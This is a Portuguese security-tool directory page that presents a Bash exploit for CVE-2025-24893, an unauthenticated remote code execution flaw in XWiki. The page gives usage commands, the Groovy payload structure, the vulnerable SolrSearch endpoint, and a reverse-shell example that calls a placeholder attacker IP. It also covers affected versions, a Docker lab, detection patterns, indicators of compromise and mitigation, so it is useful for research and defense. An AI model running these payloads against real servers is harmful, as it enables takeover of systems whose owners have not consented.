Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
XWiki-Platform-RCE-CVE-2025-24893 — Exploit em Bash para CVE-2025-24893, RCE não autenticado no XWiki Platform, usando injeção de template no macro SolrSearch para executar comandos arbitrários do sistema. | Kitploit
Ferramentas/GitHubGitHub/0xdtc/xwiki-platform-rce-cve-2025-24893
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoComando e ControleDesenvolvimento de Payloads
GitHub0xdtc/xwiki-platform-rce-cve-2025-24893

XWiki-Platform-RCE-CVE-2025-24893

Exploit em Bash para CVE-2025-24893, RCE não autenticado no XWiki Platform, usando injeção de template no macro SolrSearch para executar comandos arbitrários do sistema.

Ver Repositório
35há 9 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Exploit de RCE não autenticado no XWiki Platform

Visão Geral

Este script é uma implementação em Bash reformulada de um exploit direcionado às versões do XWiki Platform afetadas pela CVE-2025-24893. Ele aproveita uma vulnerabilidade crítica de execução remota de código não autenticada que permite que atacantes executem código Groovy arbitrário através de uma falha de injeção de template no macro SolrSearch.

As implementações originais do exploit em Python foram criadas por vários pesquisadores de segurança e foram adaptadas aqui para usuários de Bash, com execução simplificada e usabilidade aprimorada.

Detalhes da Vulnerabilidade

  • Descobridor: John Kwak (Trend Micro's Zero Day Initiative)
  • CVE: CVE-2025-24893
  • Pontuação CVSS: 9.8 (Crítica)
  • Referências:
    • Aviso de Segurança Oficial do XWiki (GHSA-rr6p-3pfg-562j)
    • Catálogo de Vulnerabilidades Exploradas Conhecidas da CISA
VulnCheck - XWiki CVE-2025-24893 Explorado em Ambiente Real
  • Blog OffSec - RCE não autenticado no XWiki
  • Descrição: A vulnerabilidade decorre da sanitização inadequada de entrada no macro SolrSearch do XWiki Platform. O macro falha em validar e sanitizar corretamente a entrada fornecida pelo usuário no parâmetro text quando acessado via endpoint RSS de mídia, permitindo que atacantes injetem código Groovy malicioso no pipeline de renderização sem autenticação.
  • Versões Afetadas e Corrigidas

    Versões Afetadas

    • XWiki Platform: 5.3-milestone-2 até 15.10.10
    • XWiki Platform: 16.0.0-rc-1 até 16.4.0

    Versões Corrigidas

    • XWiki 15.10.11 ou superior
    • XWiki 16.4.1 ou superior
    • XWiki 16.5.0RC1 ou superior

    Funcionalidades

    • RCE não autenticado: Execute comandos de sistema arbitrários sem autenticação.
    • Bypass do Token CSRF: Explora a injeção de template sem exigir tokens CSRF.
    • Execução em Segundo Plano: Executa comandos de forma assíncrona no servidor alvo.
    • Interface de Linha de Comando Simples: Script Bash fácil de usar com dependências mínimas.

    Pré-requisitos

    • Dependências:
      • curl: Para enviar requisições HTTP.
      • jq: Para codificar o payload em URL.
      • Shell Bash.
    • Ambiente Testado: Sistema operacional Linux com Bash.

    Uso

    Conceda permissões de execução:

    root@kitploit:~
    chmod +x CVE-2025-24893
    

    Execute o script com os argumentos necessários:

    root@kitploit:~
    ./CVE-2025-24893 <url_alvo> <comando>
    

    Parâmetros

    ParâmetroDescrição
    <url_alvo>A URL do XWiki alvo (ex.: http://exemplo.com ou https://xwiki.exemplo.org). O protocolo é opcional.
    <comando>O comando de sistema a ser executado no servidor alvo.

    Exemplo

    Verificar se o alvo é vulnerável (executar comando id):

    root@kitploit:~
    ./CVE-2025-24893 http://xwiki-vulneravel.exemplo.com "id"
    

    Obter informações do sistema:

    root@kitploit:~
    ./CVE-2025-24893 http://xwiki-vulneravel.exemplo.com "uname -a"
    

    Criar um arquivo de teste:

    root@kitploit:~
    ./CVE-2025-24893 http://xwiki-vulneravel.exemplo.com "touch /tmp/pwned"
    

    Reverse shell (substitua pelo seu IP e porta):

    root@kitploit:~
    ./CVE-2025-24893 http://xwiki-vulneravel.exemplo.com "bash -c 'bash -i >& /dev/tcp/SEU_IP/SUA_PORTA 0>&1'"
    

    Fluxo do Script

    1. Interpretação dos Argumentos da Linha de Comando:

      • Valida que tanto a URL alvo quanto o comando foram fornecidos.
      • Normaliza a URL adicionando http:// se nenhum protocolo for especificado.
    2. Construção do Payload:

      • Constrói um payload de código Groovy que executa o comando especificado usando .execute().
      • Envolve o payload na sintaxe de macro do XWiki: }}}{{async async=false}}{{groovy}}<código>{{/groovy}}{{/async}}
    3. Codificação URL:

      • Codifica o payload em URL usando jq para transmissão HTTP adequada.
    4. Exploração:

      • Envia uma requisição HTTP GET para o endpoint SolrSearch vulnerável: /xwiki/bin/get/Main/SolrSearch?media=rss&text=<payload_codificado>
      • O comando é executado em segundo plano no servidor alvo.

    Detalhes Técnicos

    Mecanismo de Exploração

    A cadeia de exploração funciona da seguinte forma:

    1. Injeção de Template: O atacante cria um payload malicioso contendo código Groovy envolto na sintaxe de macro do XWiki.
    2. Direcionamento do Endpoint: O payload é enviado para o endpoint RSS do SolrSearch vulnerável.
    3. Execução de Código: O código Groovy injetado é executado no lado do servidor sem autenticação.
    4. Comprometimento do Sistema: O atacante ganha execução de código arbitrário com os privilégios da aplicação XWiki.

    Estrutura do Payload

    root@kitploit:~
    }}}{{async async=false}}{{groovy}}'<comando>'.execute();{{/groovy}}{{/async}}
    
    • }}} - Fecha qualquer contexto de macro existente
    • {{async async=false}} - Garante execução síncrona
    • {{groovy}}...{{/groovy}} - Envolve o código Groovy malicioso
    • '<comando>'.execute(); - Executa o comando de sistema especificado

    Prova de Conceito

    Configuração de Ambiente Vulnerável

    Para fins de teste, você pode configurar uma instância vulnerável do XWiki usando Docker:

    root@kitploit:~
    docker run -d -p 8080:8080 --name xwiki-vulneravel xwiki:15.10.10
    

    Demonstração de Exploração

    root@kitploit:~
    # Aguarde o XWiki iniciar (pode levar 1-2 minutos)
    ./CVE-2025-24893 http://localhost:8080 "whoami"
    

    Impacto

    A exploração bem-sucedida desta vulnerabilidade permite que um atacante não autenticado:

    • Execute comandos arbitrários do sistema no servidor
    • Leia, modifique ou exclua dados sensíveis
    • Comprometa toda a instalação do XWiki
    • Pivote para outros sistemas na rede
    • Implante mineradores de criptomoedas ou outros malwares
    • Estabeleça acesso persistente de backdoor

    Exploração em Cenário Real

    De acordo com a CISA e múltiplos fornecedores de segurança:

    • Exploração Ativa: CVE-2025-24893 está sendo explorada ativamente em ambiente real
    • Campanhas de Ataque: A VulnCheck detectou cadeias de ataque de dois estágios que implantam mineradores de criptomoedas
    • Catálogo KEV da CISA: Adicionada ao catálogo de Vulnerabilidades Exploradas Conhecidas em 30 de outubro de 2025
    • Varredura Ampla: Varredura massiva em toda a internet em busca de instâncias vulneráveis

    Detecção e Mitigação

    Detecção

    Monitore requisições suspeitas ao endpoint SolrSearch:

    root@kitploit:~
    GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=*
    

    Procure por padrões contendo:

    • {{groovy}}
    • {{async}}
    • .execute()
    • Variações codificadas em URL dos itens acima

    Indicadores de Comprometimento (IoCs)

    • Processos inesperados gerados pelo usuário da aplicação XWiki
    • Novos arquivos em /tmp ou outros diretórios graváveis
    • Conexões de rede de saída para IPs desconhecidos
    • Processos de mineração de criptomoedas (alto uso de CPU)

    Mitigação

    1. Atualize o XWiki para uma versão corrigida:

      • Versão 15.10.11 ou superior
      • Versão 16.4.1 ou superior
      • Versão 16.5.0RC1 ou superior
    2. Aplique Soluções Temporárias (se a correção imediata não for possível):

      • Restrinja o acesso ao endpoint SolrSearch via Web Application Firewall (WAF)
      • Desative o macro SolrSearch se não for necessário
      • Implemente segmentação de rede para limitar a exposição
    3. Monitore por Comprometimento:

      • Revise logs em busca de tentativas de exploração
      • Verifique modificações não autorizadas em arquivos
      • Escaneie por mineradores de criptomoedas e backdoors

    Limitações

    • Comandos executam em segundo plano; a saída pode não ser imediatamente visível.
    • A verificação da execução do comando requer métodos de canal indireto (ex.: criação de arquivos, conexões de rede).
    • Requer que o alvo tenha o macro SolrSearch habilitado (configuração padrão).

    Créditos

    • Descobridor da Vulnerabilidade: John Kwak (Trend Micro's Zero Day Initiative)
    • Autores Originais do Exploit em Python: Vários pesquisadores de segurança
    • Script Adaptado: Reformulado por [0xdtc] Construído em BASH

    Aviso Legal

    Este script é para fins educacionais apenas. O uso não autorizado desta ferramenta contra sistemas que você não possui ou não tem permissão explícita para testar é ilegal e antiético. Use com responsabilidade.

    Você deve ter permissão explícita por escrito do proprietário do sistema antes de testar.

    O(s) autor(es) desta ferramenta não são responsáveis por qualquer uso indevido ou dano causado por este script. Os usuários são os únicos responsáveis por garantir que possuem a devida autorização e cumprem todas as leis e regulamentações aplicáveis.

    Baixar ferramenta